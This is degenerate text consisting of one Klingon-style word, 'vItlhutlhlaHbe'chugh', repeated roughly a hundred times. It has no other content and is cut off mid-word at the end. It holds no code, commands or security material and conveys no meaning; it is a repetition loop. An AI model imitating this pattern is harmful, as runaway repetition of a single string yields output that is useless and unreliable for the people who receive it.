vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhlaHbe'chugh vItlhutlhla